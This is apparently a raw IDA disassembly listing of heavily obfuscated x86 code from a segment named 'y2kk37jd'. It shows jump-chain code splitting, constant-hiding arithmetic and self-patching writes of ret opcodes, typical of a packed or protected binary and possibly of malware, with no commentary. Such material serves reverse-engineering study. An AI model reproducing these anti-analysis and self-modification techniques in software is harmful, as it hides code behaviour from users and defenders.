		xchg	eax, [esp+0]
		pop	eax
		add	eax, 79D7FB0Dh
		mov	eax, [eax]
		popf
		mov	al, [eax]
		jmp	loc_456ED5
sub_450B30	endp ; sp-analysis failed

; ---------------------------------------------------------------------------
		sub	ecx, 68ADA735h
		not	ecx
		jmp	sub_4595D8
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44594E

loc_450B51:				; CODE XREF: sub_44594E:loc_43C41Bj
		rol	edi, 15h
		cmp	edi, 3A544A59h
		jmp	loc_443B1D
; END OF FUNCTION CHUNK	FOR sub_44594E
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_459546

loc_450B5F:				; CODE XREF: sub_459546-8B5Bj
		add	ecx, 6808E516h
		popf
		xchg	ecx, [esp-4+arg_0]
		jmp	sub_442C3E
; END OF FUNCTION CHUNK	FOR sub_459546
; ---------------------------------------------------------------------------

loc_450B6E:				; CODE XREF: y2kk37jd:00444B92j
		or	edx, ecx
		mov	[eax], ebx

loc_450B72:				; CODE XREF: y2kk37jd:loc_44D829j
		push	ebp
		mov	ebp, eax
		xchg	ebp, [esp]
		lea	eax, loc_4476C0
		jmp	loc_44EC8E
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_441F5E

loc_450B83:				; CODE XREF: sub_441F5E+Fj
		jz	loc_44CFE6
		jmp	loc_458D9F
; END OF FUNCTION CHUNK	FOR sub_441F5E
; ---------------------------------------------------------------------------

loc_450B8E:				; DATA XREF: sub_43BD0D+F71Co
		mov	edx, [esp]
		push	ebp
		mov	ebp, eax
		xchg	ebp, [esp]

loc_450B97:				; DATA XREF: sub_44EC21-9094o
		mov	eax, edx
		nop
		mov	eax, [esp]
		jmp	loc_440C84
; ---------------------------------------------------------------------------
		dw 0B126h
		dd 58161DF7h
; ---------------------------------------------------------------------------

loc_450BA8:				; CODE XREF: y2kk37jd:00459B2Dj
		jmp	loc_44FA44
; ---------------------------------------------------------------------------
		align 2
		dw 0E5CFh
dword_450BB0	dd 1877DD60h		; DATA XREF: y2kk37jd:004462B6w
					; y2kk37jd:0044BC1Br
dword_450BB4	dd 0			; DATA XREF: y2kk37jd:004472D4o
					; sub_448658+72A5o
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_447407

loc_450BB8:				; CODE XREF: sub_447407+105D0j
		jmp	loc_4536AA
; END OF FUNCTION CHUNK	FOR sub_447407
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4413E3

loc_450BBD:				; CODE XREF: sub_4413E3+CCB5j
		jmp	sub_44E5E5
; END OF FUNCTION CHUNK	FOR sub_4413E3
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43BF5F

loc_450BC2:				; CODE XREF: sub_43BF5F+920Bj
		jmp	nullsub_458
; END OF FUNCTION CHUNK	FOR sub_43BF5F
; ---------------------------------------------------------------------------
		db 74h
dword_450BC8	dd 153940h		; DATA XREF: y2kk37jd:004472DEr
					; sub_448658+729Er ...
; ---------------------------------------------------------------------------

loc_450BCC:				; CODE XREF: y2kk37jd:0045169Bj
		jmp	loc_44B1C0
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_442829

loc_450BD1:				; CODE XREF: sub_442829+C0C1j
		jmp	loc_43BA87
; END OF FUNCTION CHUNK	FOR sub_442829
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4411C3

loc_450BD6:				; CODE XREF: sub_4411C3+16711j
		pop	ebp
		sub	ecx, 44DCFC57h
		push	0D2BA702Eh
		jo	loc_44A0C3
		jmp	loc_4424F4
; END OF FUNCTION CHUNK	FOR sub_4411C3
; ---------------------------------------------------------------------------

loc_450BED:				; CODE XREF: y2kk37jd:0043C27Aj
		mov	eax, 0D1CB0F56h

loc_450BF2:				; CODE XREF: y2kk37jd:loc_44351Dj
		call	sub_442C3E
		mov	ds:dword_41E134, eax
		lea	eax, nullsub_457
		mov	byte ptr [eax],	0C3h
		jmp	loc_45B1C8
; ---------------------------------------------------------------------------
		pop	edx
		jmp	loc_453DC4
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_45B7AA

loc_450C11:				; CODE XREF: sub_45B7AA:loc_4568AFj
		jnz	loc_4512A8
		jmp	loc_455C8C
; END OF FUNCTION CHUNK	FOR sub_45B7AA
; ---------------------------------------------------------------------------

loc_450C1C:				; DATA XREF: sub_43F2F2:loc_44D331o
		jmp	loc_440850
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43F2F2

loc_450C21:				; CODE XREF: sub_43F2F2+CEA0j
					; sub_44EEC8+3j
		xchg	ebx, [esp+4+var_4]
		mov	ecx, ebx
		pop	ebx
		pop	ebp
		jmp	nullsub_127
; END OF FUNCTION CHUNK	FOR sub_43F2F2
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_445568

loc_450C2D:				; CODE XREF: sub_445568+109EDj
		jnb	loc_443C1E
		sbb	edx, ebx
		jmp	loc_440C6F
; END OF FUNCTION CHUNK	FOR sub_445568

; =============== S U B	R O U T	I N E =======================================



sub_450C3A	proc near		; DATA XREF: y2kk37jd:0043F6ABo
		call	sub_447041
		call	sub_4593F8
sub_450C3A	endp ; sp-analysis failed

; START	OF FUNCTION CHUNK FOR sub_440337

loc_450C44:				; CODE XREF: sub_440337+C7B0j
		jmp	loc_457849
; END OF FUNCTION CHUNK	FOR sub_440337
; ---------------------------------------------------------------------------

loc_450C49:				; CODE XREF: y2kk37jd:loc_441E44j
		jmp	loc_444657
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_448C53

loc_450C4E:				; CODE XREF: sub_448C53:loc_448C59j
		xor	ebp, 0F880B87Ah
		jmp	loc_44F38B
; END OF FUNCTION CHUNK	FOR sub_448C53
; ---------------------------------------------------------------------------
		push	edi
		push	7080E21Ah
		pop	edi
		or	edi, 0FF4002E5h
		jmp	loc_44FB78
; ---------------------------------------------------------------------------
		or	eax, eax
		jnz	loc_454043
		jmp	loc_4542C0
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_358. PRESS KEYPAD	"+" TO EXPAND]
; ---------------------------------------------------------------------------

loc_450C79:				; CODE XREF: y2kk37jd:0045B5BCj
		jmp	loc_454302
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_45689F

loc_450C7E:				; CODE XREF: sub_45689F+12E1j
		jmp	loc_44A660
; END OF FUNCTION CHUNK	FOR sub_45689F
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_443AFD

loc_450C83:				; CODE XREF: sub_443AFD:loc_443AFEj
		jnz	loc_441495
		mov	eax, [esp-4+arg_0]
		push	ebp
		mov	ebp, edx
		call	sub_44516F

loc_450C94:				; CODE XREF: y2kk37jd:004521CAj
		jmp	loc_446836
; END OF FUNCTION CHUNK	FOR sub_443AFD
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43B765

loc_450C99:				; CODE XREF: sub_43B765+Aj
		rol	eax, 10h
		push	eax
		push	61A2A83Dh
		pop	eax
		xor	eax, 6ABDBAF5h
		test	eax, 10000h
		jmp	loc_44080A
; END OF FUNCTION CHUNK	FOR sub_43B765
; ---------------------------------------------------------------------------
		mov	eax, 72B18749h
		call	sub_442C3E
		push	esi
		push	0BC6F6A44h
		pop	esi
		or	esi, 705F00Fh

loc_450CCB:				; CODE XREF: y2kk37jd:0044AA19j
					; y2kk37jd:loc_44B8BAj
		sub	esi, ds:4000F0h
		jmp	loc_44EDD2

; =============== S U B	R O U T	I N E =======================================



sub_450CD6	proc near		; CODE XREF: sub_445F64+D86Fp
					; y2kk37jd:0045841Bj
		xchg	ebx, [esp+0]
		pop	ebx
		lea	eax, [ebp-80Ch]
		push	offset loc_44B801
		jmp	nullsub_100
sub_450CD6	endp

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_457D5A

loc_450CEA:				; CODE XREF: sub_457D5A-1A1D1j
		cmp	eax, edx
		jmp	loc_4451A0
; END OF FUNCTION CHUNK	FOR sub_457D5A
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43E389

loc_450CF1:				; CODE XREF: sub_43E389+16j
		cmp	eax, 19C86FA8h
		jmp	loc_447673
; END OF FUNCTION CHUNK	FOR sub_43E389

; =============== S U B	R O U T	I N E =======================================



sub_450CFC	proc near		; CODE XREF: sub_44AD49:loc_4541FBp
					; sub_4460D0+112FAj

; FUNCTION CHUNK AT 00449D98 SIZE 00000005 BYTES

		xchg	edx, [esp+0]
		pop	edx
		mov	dword ptr [ebp-0FCh], 6F6C2074h
		mov	dword ptr [ebp-0F8h], 206461h
		mov	dword ptr [ebp-108h], 0Bh

loc_450D1E:				; CODE XREF: y2kk37jd:loc_444AE4j
		push	offset loc_441ED6
		jmp	loc_449D98
sub_450CFC	endp

; ---------------------------------------------------------------------------

loc_450D28:				; CODE XREF: y2kk37jd:004562FCj
		jno	sub_44D6BF
		sbb	ebp, 0DE302110h

; =============== S U B	R O U T	I N E =======================================



sub_450D34	proc near		; CODE XREF: sub_448587+11CC3p
		xchg	esi, [esp+0]
		pop	esi
		jnz	loc_4448C8
		jmp	nullsub_493
sub_450D34	endp ; sp-analysis failed

; [00000001 BYTES: COLLAPSED FUNCTION nullsub_104. PRESS KEYPAD	"+" TO EXPAND]
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_45921B

loc_450D44:				; CODE XREF: sub_45921B+Bj
		jmp	loc_45B696
; END OF FUNCTION CHUNK	FOR sub_45921B
; ---------------------------------------------------------------------------

loc_450D49:				; CODE XREF: y2kk37jd:0043B2E6j
		shr	ecx, 2

; =============== S U B	R O U T	I N E =======================================



sub_450D4C	proc near		; CODE XREF: sub_45392D-1E0Fp
		xchg	esi, [esp+0]
		pop	esi

loc_450D50:				; CODE XREF: y2kk37jd:loc_4400F4j
		mov	[ebx], eax
		pop	ebx
		lea	eax, sub_4477A2
		mov	byte ptr [eax],	0C3h
		jmp	sub_4477A2
sub_450D4C	endp ; sp-analysis failed


; =============== S U B	R O U T	I N E =======================================



sub_450D61	proc near		; CODE XREF: sub_41A5B4+3Bp
					; sub_450D61:loc_446AC0j
					; DATA XREF: ...

; FUNCTION CHUNK AT 00446AC0 SIZE 00000006 BYTES

		call	sub_446AC6
		jmp	loc_446AC0
sub_450D61	endp

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_45689F

loc_450D6B:				; CODE XREF: sub_45689F:loc_43E5AEj
		jz	loc_450872
		sbb	edi, edx
		jmp	loc_450869
; END OF FUNCTION CHUNK	FOR sub_45689F

; =============== S U B	R O U T	I N E =======================================



sub_450D78	proc near		; DATA XREF: sub_44A3E7-A76Eo
		pop	ecx
		mov	ebx, [eax]
		push	esi
		push	3F1D3447h
		pop	esi
		rol	esi, 7
		jmp	loc_44AE68
sub_450D78	endp

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44113A

loc_450D8A:				; CODE XREF: sub_44113A:loc_448235j
		mov	edi, 8BF3DD00h
		popf

loc_450D90:				; CODE XREF: sub_456809:loc_448B22j
		mov	edx, ebp
		shl	ebp, 12h
		xor	esi, 0B21E192Eh
		jmp	loc_4552E3
; END OF FUNCTION CHUNK	FOR sub_44113A
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_453867

loc_450DA0:				; CODE XREF: sub_453867:loc_456E97j
		jz	loc_446487
		sub	al, 99h
		mov	edx, [ebp-4]
		imul	byte ptr [edx]
		cmp	al, 0A4h
		jz	loc_454013
		jmp	loc_443A0C
; END OF FUNCTION CHUNK	FOR sub_453867
; ---------------------------------------------------------------------------

loc_450DBA:				; CODE XREF: y2kk37jd:0043C29Cj
		shr	eax, 16h
		add	edx, eax
		jl	loc_450AC6
		mov	[ebx], edx
; START	OF FUNCTION CHUNK FOR sub_4490B4

loc_450DC7:				; CODE XREF: sub_4490B4+FB65j
		add	ecx, 0D1630676h
		or	ecx, 8BA409F6h
		xor	ecx, 0DBBE0DF7h
		jmp	loc_45C6A4
; END OF FUNCTION CHUNK	FOR sub_4490B4
; ---------------------------------------------------------------------------

loc_450DDE:				; CODE XREF: y2kk37jd:0044C299j
		test	ecx, 3198E66Fh
		jmp	loc_4440A5
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_453867

loc_450DE9:				; CODE XREF: sub_453867-5CC4j
		jge	loc_45BE89

loc_450DEF:				; CODE XREF: sub_455556+5EE9j
		jmp	loc_459C08
; END OF FUNCTION CHUNK	FOR sub_453867
; ---------------------------------------------------------------------------
		jge	loc_441B6E
		jl	loc_442BD6
		test	eax, esi
		jmp	loc_44AA38
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43BAF2

loc_450E07:				; CODE XREF: sub_43BAF2:loc_43B373j
		and	edx, eax
		setnz	byte ptr [ebp-5]
		call	sub_459AFA
		push	0D403B21h
		pop	edx
		sub	edx, 1167DDFCh
		add	edx, 46CAEA3h
		mov	edx, [edx]
		jmp	loc_45A872
; END OF FUNCTION CHUNK	FOR sub_43BAF2
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_442. PRESS KEYPAD	"+" TO EXPAND]
; ---------------------------------------------------------------------------
		add	al, 24h
		push	offset sub_44131E
		jmp	locret_43EDE2
; ---------------------------------------------------------------------------

loc_450E38:				; CODE XREF: y2kk37jd:0043F79Bj
		adc	eax, esi
		or	edx, esi

loc_450E3C:				; CODE XREF: y2kk37jd:loc_43C43Aj
		mov	eax, [ebp-0Ch]
		cmp	eax, ds:dword_446650
		jz	loc_458FB4
		jmp	loc_450954
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44132A

loc_450E50:				; CODE XREF: sub_44132A+1j
		mov	ebx, edx
		xchg	ebx, [esp+4+var_4]

loc_450E55:				; CODE XREF: y2kk37jd:0044D3FEj
		push	ecx
		push	528D29D3h
		pop	ecx
		add	ecx, 5DB94F3h
		xor	ecx, 0EE4A315Ah
		add	ecx, 4A21D424h
		jmp	loc_44C133
; END OF FUNCTION CHUNK	FOR sub_44132A
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43C054

loc_450E73:				; CODE XREF: sub_43C054+11365j
		mov	eax, offset loc_44662C
		call	sub_4581BB
		lea	eax, [ebp-14h]
		push	eax
		call	sub_43BA66
		jmp	loc_446DBA
; END OF FUNCTION CHUNK	FOR sub_43C054
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43D8B6

loc_450E8B:				; CODE XREF: sub_43D8B6-253Dj
		cdq

loc_450E8C:				; CODE XREF: sub_43D8B6:loc_43C7EEj
		push	edx
		push	0AA9C88D2h
		pop	edx
		xor	edx, 603264A0h
		jmp	loc_45C418
; END OF FUNCTION CHUNK	FOR sub_43D8B6
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4447EA

loc_450E9E:				; CODE XREF: sub_4447EA:loc_44668Dj
		pop	eax

loc_450E9F:				; CODE XREF: sub_444825:loc_4578F6j
		rol	eax, 0Fh
		add	eax, 0A8BC3540h
		xchg	eax, [esp+4+var_4]
		jmp	loc_44BCE7
; END OF FUNCTION CHUNK	FOR sub_4447EA
; ---------------------------------------------------------------------------

loc_450EB0:				; CODE XREF: y2kk37jd:00446DA0j
		xor	eax, ebp
; START	OF FUNCTION CHUNK FOR sub_449734

loc_450EB2:				; CODE XREF: sub_449734:loc_4512C5j
		add	ebx, 22E097C1h
		push	offset loc_43F0C7
		jmp	nullsub_411
; END OF FUNCTION CHUNK	FOR sub_449734
; ---------------------------------------------------------------------------

loc_450EC2:				; DATA XREF: sub_440D81+6o
		jno	loc_445495
		sub	al, 99h
		push	0CFC6BA8Ah
		pop	edx
		add	edx, 0CBE5EB13h
		sub	edx, 5F6C33Ch
		jnb	loc_457F24
		xchg	esi, eax
; START	OF FUNCTION CHUNK FOR sub_445226

loc_450EE4:				; CODE XREF: sub_445226+12255j
		jmp	loc_457F23
; END OF FUNCTION CHUNK	FOR sub_445226
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_45024B

loc_450EE9:				; CODE XREF: sub_45024B:loc_450258j
		xor	edi, 38F9E87Eh
		or	edi, 7D3526AEh
		add	edi, 24C1012h
		push	offset sub_452A20
		jmp	loc_44E495
; END OF FUNCTION CHUNK	FOR sub_45024B
; ---------------------------------------------------------------------------

loc_450F05:				; CODE XREF: y2kk37jd:0043F05Bj
		jnz	loc_43F2CF

; =============== S U B	R O U T	I N E =======================================



sub_450F0B	proc near		; CODE XREF: sub_4480CB:loc_4591A9p

; FUNCTION CHUNK AT 00444631 SIZE 00000005 BYTES

		xchg	eax, [esp+0]
		pop	eax
		add	edx, 14h
		jmp	loc_444631
sub_450F0B	endp ; sp-analysis failed


; =============== S U B	R O U T	I N E =======================================



sub_450F17	proc near		; DATA XREF: sub_447E3E:loc_456C7Ao

; FUNCTION CHUNK AT 00442CCF SIZE 00000016 BYTES
; FUNCTION CHUNK AT 0045B204 SIZE 0000000D BYTES

		push	0DBD2EDD2h
		pop	eax
		xor	eax, 1E29529Eh
		or	eax, 86A4D385h

loc_450F29:				; CODE XREF: sub_45A2F9-9D10j
		and	eax, 2821EEh
		jmp	loc_442CCF
sub_450F17	endp


; =============== S U B	R O U T	I N E =======================================



sub_450F34	proc near		; DATA XREF: sub_45689F:loc_449184o

var_4		= dword	ptr -4
arg_0		= dword	ptr  4
arg_4		= dword	ptr  8

; FUNCTION CHUNK AT 0044E2AB SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0044E5F5 SIZE 0000000D BYTES

		push	edi
		call	sub_4531A2

loc_450F3A:				; CODE XREF: sub_4474A9-69D5p
					; y2kk37jd:0044965Aj
		xchg	edx, [esp-8+arg_4]

loc_450F3D:				; CODE XREF: y2kk37jd:loc_451945j
		pop	edx
		xchg	edi, [esp+0]
		mov	edx, edi
		pop	edi
		pop	ebx
		xchg	esi, [esp+0]
		push	esi
		jmp	loc_44E2AB
sub_450F34	endp ; sp-analysis failed

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_45157A

loc_450F4E:				; CODE XREF: sub_45157A:loc_454357j
		pop	ebx
		rol	ebx, 9
		or	ebx, 372D0AADh
		jnz	loc_43F8F1

loc_450F5E:				; CODE XREF: sub_45157A-C6B5j
		jmp	sub_44884D
; END OF FUNCTION CHUNK	FOR sub_45157A
; ---------------------------------------------------------------------------
		add	ebx, ebp
		jmp	sub_458775
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4578A6

loc_450F6A:				; CODE XREF: sub_4578A6:loc_4555A3j
		mov	eax, [eax]
		mov	al, [eax]
		jnz	loc_455A1C
		sub	al, 99h
		mov	edx, [ebp-4]
		imul	byte ptr [edx]
		jmp	loc_458B1D
; END OF FUNCTION CHUNK	FOR sub_4578A6
; ---------------------------------------------------------------------------

loc_450F80:				; CODE XREF: y2kk37jd:00457E8Ej
		mov	ebx, [esi]
		jnp	loc_43EC52
		sbb	edx, 0F8002B94h
; START	OF FUNCTION CHUNK FOR sub_448658

loc_450F8E:				; CODE XREF: sub_448658:loc_457E76j
		sub	eax, 0E1A457F3h
		rol	eax, 1Ah
		and	eax, 96B9225Bh
		xor	eax, 80310251h
		shl	eax, cl
		jmp	loc_43C633
; END OF FUNCTION CHUNK	FOR sub_448658
; ---------------------------------------------------------------------------
		pushf
		not	esi
		jmp	sub_459ADE
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_446718

loc_450FB2:				; CODE XREF: sub_446718:loc_44F37Cj
		mov	eax, ebp
		pop	ebp
		or	eax, 25EC9174h
		add	eax, 8374B4DDh
		call	sub_442C3E
		jmp	loc_447AF4
; END OF FUNCTION CHUNK	FOR sub_446718
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_45689F

loc_450FCB:				; CODE XREF: sub_45689F:loc_44AFC3j
					; y2kk37jd:0044AFE3j
		call	sub_450891

loc_450FD0:				; CODE XREF: sub_453B38+416Fj
		jmp	loc_442319
; END OF FUNCTION CHUNK	FOR sub_45689F
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44B0D0

loc_450FD5:				; CODE XREF: sub_44B0D0+Fj
		jmp	loc_45BE99
; END OF FUNCTION CHUNK	FOR sub_44B0D0
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4486B1

loc_450FDA:				; CODE XREF: sub_4486B1+6j
		jmp	loc_44B747
; END OF FUNCTION CHUNK	FOR sub_4486B1
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_445EF2

loc_450FDF:				; CODE XREF: sub_445EF2-19F7j
					; y2kk37jd:0045BB82j
		jmp	loc_43F5DC
; END OF FUNCTION CHUNK	FOR sub_445EF2

; =============== S U B	R O U T	I N E =======================================



sub_450FE4	proc near		; CODE XREF: y2kk37jd:0044669Bj
					; DATA XREF: sub_43B4EE:loc_4587A0o
		push	edx
		push	9312089Dh
		pop	edx
		rol	edx, 1
		jmp	loc_4568AA
sub_450FE4	endp

; ---------------------------------------------------------------------------

loc_450FF2:				; CODE XREF: y2kk37jd:004503EDj
		jbe	sub_43C851
; START	OF FUNCTION CHUNK FOR sub_43F346

loc_450FF8:				; CODE XREF: sub_43F346:loc_45087Aj
		xor	esi, 0C6BA242Bh
		add	eax, esi
		pop	esi
		mov	eax, [eax]
		cmp	byte ptr [eax],	0F1h
		jnz	loc_4455DD
		jmp	loc_452219
; END OF FUNCTION CHUNK	FOR sub_43F346
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_445226

loc_451011:				; CODE XREF: sub_445226+178j
		xchg	edi, [esp+0Ch+var_C]
		mov	ecx, edi
		pop	edi

locret_451017:				; CODE XREF: y2kk37jd:004518BEj
		retn
; END OF FUNCTION CHUNK	FOR sub_445226
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_451C21

loc_451018:				; CODE XREF: sub_451C21-474Cj
		jmp	loc_456488
; END OF FUNCTION CHUNK	FOR sub_451C21
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4518C3

loc_45101D:				; CODE XREF: sub_44EE3D-12E64j
					; sub_4518C3-4E80j
		rol	eax, 0Bh
		push	ebp
		jmp	loc_44763C
; END OF FUNCTION CHUNK	FOR sub_4518C3
; ---------------------------------------------------------------------------
		mov	eax, 320057C2h
		call	sub_44113A
		push	esi
		mov	esi, ebx
		jmp	loc_45A298
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_459F8F

loc_451038:				; CODE XREF: y2kk37jd:00440F34j
					; sub_459F8F-11D33j
		xor	eax, 0E72723E9h
		add	eax, ebp
		call	sub_442081
; END OF FUNCTION CHUNK	FOR sub_459F8F
; START	OF FUNCTION CHUNK FOR sub_44B508

loc_451045:				; CODE XREF: sub_44B508-6DE1j
		jmp	loc_442655
; END OF FUNCTION CHUNK	FOR sub_44B508

; =============== S U B	R O U T	I N E =======================================



sub_45104A	proc near		; CODE XREF: sub_44E73B+6p
					; y2kk37jd:00451FACj

; FUNCTION CHUNK AT 0045729C SIZE 00000016 BYTES

		xchg	ecx, [esp+0]
		pop	ecx
		add	edx, ebp
		add	edx, 5FBD84ADh
		mov	edx, [edx]
		pushf
		add	edx, 0D94F694h
		jmp	loc_45729C
sub_45104A	endp ; sp-analysis failed

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_455613

loc_451064:				; CODE XREF: sub_455613:loc_443026j
					; y2kk37jd:0044303Fj
		xor	esi, 0DDA02889h
		add	edi, esi
		pop	esi
		mov	edi, [edi]
		add	eax, edi
		jmp	loc_45401D
; END OF FUNCTION CHUNK	FOR sub_455613
; ---------------------------------------------------------------------------

loc_451076:				; CODE XREF: y2kk37jd:loc_441FC5j
		jz	loc_44882F
; START	OF FUNCTION CHUNK FOR sub_44F44F

loc_45107C:				; CODE XREF: sub_44F44F-F6AFj
		jmp	nullsub_225
; END OF FUNCTION CHUNK	FOR sub_44F44F
; ---------------------------------------------------------------------------
		add	ecx, esi
		add	edx, esi
		jmp	loc_448828
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_453867

loc_45108A:				; CODE XREF: sub_453867:loc_44906Ej
		push	480E70B4h
		pop	edi
		xor	edi, 0E45E74B8h
		or	edi, ds:4000E9h
		add	edi, 514EDA53h
		jmp	loc_4508EC
; END OF FUNCTION CHUNK	FOR sub_453867
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_45447D

loc_4510A7:				; CODE XREF: sub_45447D:loc_44F34Bj
		jnz	loc_45BF35
		jmp	loc_43DB57
; END OF FUNCTION CHUNK	FOR sub_45447D
; ---------------------------------------------------------------------------
		xchg	ecx, ebp
		jmp	sub_44CB7B
; ---------------------------------------------------------------------------

loc_4510B9:				; CODE XREF: y2kk37jd:loc_4460C6j
		mov	byte ptr [eax],	0C3h
		jmp	nullsub_6
; ---------------------------------------------------------------------------
		call	nullsub_494
		jmp	ds:dword_41E18C
; ---------------------------------------------------------------------------

loc_4510CC:				; CODE XREF: y2kk37jd:004593EBj
		jmp	nullsub_1
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_446718

loc_4510D1:				; CODE XREF: sub_446718-2F0Ej
		jmp	loc_456EEA
; END OF FUNCTION CHUNK	FOR sub_446718
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_448DCA

loc_4510D6:				; CODE XREF: sub_448DCA-9B4Aj
		jmp	loc_449757
; END OF FUNCTION CHUNK	FOR sub_448DCA
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_494. PRESS KEYPAD	"+" TO EXPAND]
; ---------------------------------------------------------------------------
		cmp	al, 24h
		mov	edx, edi
		push	offset sub_44B6E8
		jmp	locret_45373A
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44F641

loc_4510EA:				; CODE XREF: sub_44F641:loc_44F651j
		add	ecx, 64159400h
		call	sub_43C5B4

loc_4510F5:				; CODE XREF: sub_442081+10845j
		jmp	loc_4512FF
; END OF FUNCTION CHUNK	FOR sub_44F641
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43BDF4

loc_4510FA:				; CODE XREF: sub_43BDF4+Cj
		mov	esp, ebp
		xchg	eax, [esp+0]
		mov	ebp, eax
		pop	eax
		mov	eax, ds:dword_447344
		jmp	loc_43B03C
; END OF FUNCTION CHUNK	FOR sub_43BDF4
; ---------------------------------------------------------------------------

loc_45110D:				; CODE XREF: y2kk37jd:loc_43BAB0j
		call	sub_441718
		push	0FD5A4A49h
		pop	eax
		rol	eax, 10h
		and	eax, 0CAF66582h
		xor	eax, 0A074516Dh
		push	esi
		jmp	loc_45572F
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4477F9

loc_45112D:				; CODE XREF: sub_4477F9+486Bj
		xchg	edx, [esp+8+var_8]
		jmp	loc_45A4FD
; END OF FUNCTION CHUNK	FOR sub_4477F9
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_495. PRESS KEYPAD	"+" TO EXPAND]
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44FB6D

loc_451136:				; CODE XREF: sub_44FB6D+5j
		jmp	loc_44D013
; END OF FUNCTION CHUNK	FOR sub_44FB6D
; ---------------------------------------------------------------------------

loc_45113B:				; CODE XREF: y2kk37jd:loc_43CE8Aj
		and	ecx, 0D962CECAh
		xor	ecx, 261588B4h
		add	ecx, 10C5D80h
		xchg	ecx, [esp]
		jmp	sub_440CD1
; ---------------------------------------------------------------------------
		jo	loc_4542D7
		jmp	sub_455C79
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44F086

loc_451160:				; CODE XREF: sub_44F086:loc_43B93Ej
		test	edx, 2000000h
		jmp	loc_45C22F
; END OF FUNCTION CHUNK	FOR sub_44F086
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44F3F5

loc_45116B:				; CODE XREF: sub_44F3F5:loc_458CBFj
		jnz	loc_452323
		jmp	loc_4473FA
; END OF FUNCTION CHUNK	FOR sub_44F3F5
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_380. PRESS KEYPAD	"+" TO EXPAND]
; ---------------------------------------------------------------------------

loc_451177:				; CODE XREF: y2kk37jd:0045A207j
		jmp	nullsub_500
; ---------------------------------------------------------------------------
		mov	eax, 19A5E09Eh
		call	sub_442C3E
		mov	ds:dword_41E138, eax
		lea	eax, nullsub_497
		mov	byte ptr [eax],	0C3h
		jmp	nullsub_497

; =============== S U B	R O U T	I N E =======================================



sub_45119A	proc near		; CODE XREF: sub_40B4CD:loc_40B5ABp
					; y2kk37jd:0043E75Aj
					; DATA XREF: ...

var_4		= dword	ptr -4

; FUNCTION CHUNK AT 0044C2DB SIZE 0000001A BYTES

		push	edi
		jmp	loc_44C2DB
sub_45119A	endp

; ---------------------------------------------------------------------------
		pushf
		jmp	sub_454371
; ---------------------------------------------------------------------------

loc_4511A6:				; CODE XREF: y2kk37jd:loc_44800Ej
		jz	loc_45502E
		or	ecx, ebp
		push	53EFE113h
		shr	edx, 1
		jl	loc_451CC6
		jmp	loc_45502C
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43BD78

loc_4511C0:				; CODE XREF: sub_43BD78+1DEADj
		add	ebp, 0D2DA96A5h
		jmp	loc_459D10
; END OF FUNCTION CHUNK	FOR sub_43BD78
